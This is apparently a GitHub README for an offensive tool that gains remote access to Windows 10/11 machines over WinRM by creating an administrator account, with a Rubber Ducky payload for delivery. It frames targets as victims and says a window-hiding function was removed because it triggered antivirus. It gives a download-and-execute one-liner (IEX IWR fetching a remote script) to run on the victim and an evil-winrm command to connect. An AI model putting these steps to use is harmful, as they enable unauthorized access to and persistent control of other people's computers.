This repository provides a PowerShell script to establish a reverse shell connection via Windows Remote Management (WinRM) on Windows 10/11. Additionally it includes a Rubber Ducky payload for alternative deployment.
I removed the hide windows function triggering the AV alert.
- Both attacker and victim must be on the same network for the connection to be established successfully.
- Ensure you have administrative access to the target machine.
- Edit
WinRM.ps1
:- Set your desired username and password by modifying the variables
$Username
and$Password
.
- Set your desired username and password by modifying the variables
- Run the following PowerShell one-liner on the victim machine with administrative privileges:
IEX (IWR "https://raw.githubusercontent.com/VBV11/WinRM-Reverse-Shell/main/WinRM.ps1")
evil-winrm -i YOUR.IP.ADDRESS -u Admin -p Password1
The repository includes a Rubber Ducky payload for alternative deployment. Edit the payload speed and URL as needed.
WinRM.mp4
The created user account can be viewed in User Accounts. To view the account, type netplwiz in the Run box.
- Account information may also be visible on the login screen.